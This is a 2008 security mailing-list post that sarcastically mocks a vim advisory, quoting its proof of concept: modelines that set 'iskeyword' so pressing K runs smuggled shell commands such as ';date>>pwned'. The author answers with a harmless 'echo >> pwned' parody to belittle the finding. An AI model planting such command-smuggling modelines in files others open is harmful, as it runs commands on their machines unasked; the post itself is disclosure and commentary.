Date: Fri, 22 Aug 2008 10:43:01 -0600
From: Bob Beck <beck@...berta.ca>
To: Jan Min???? <rdancer@...ncer.org>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Arbitrary Command Execution in Windows and Unix
	Shells.

Stupidity + Copy and Paste Considered Harmful

> 4. EXPLOIT
>
> Copy-and-paste these examples into separate files:
>
>     ;xclock
>     vim: set iskeyword=;,@
>
> Place your cursor on ``xclock'', and press K.  xclock appears.
>
>     ;date>>pwned
>     vim: set iskeyword=1-255
>
> Place your cursor on ``date'' and press K.  File ``pwned'' is created in
> the current working directory.
>
> Please note: If modeline processing is disabled, set the 'iskeyword'
> option manually.
>
> See the thread on the Vim Developers' mailing list for some other
> examples[2].

(yes indeed, vim doesn't completely sanitize it's input)

EXPLOIT:

echo '1 b3 1ee7' >> pwned

Copy and paste the above line into a unix shell or windows cmd window. File pwned is
created. Note, if the windowing system is not started, type the above command in
manually.

IMPACT:

 I can create this file and mail it to ANYONE! ZOMG!  Someone get me
Kaminsky's slide templates so I can get the PR machine going for this
discovery.

And I thought XSS stuff was lame. Sheesh.

--
#!/usr/bin/perl
if ((not 0 && not 1) !=  (! 0 && ! 1)) {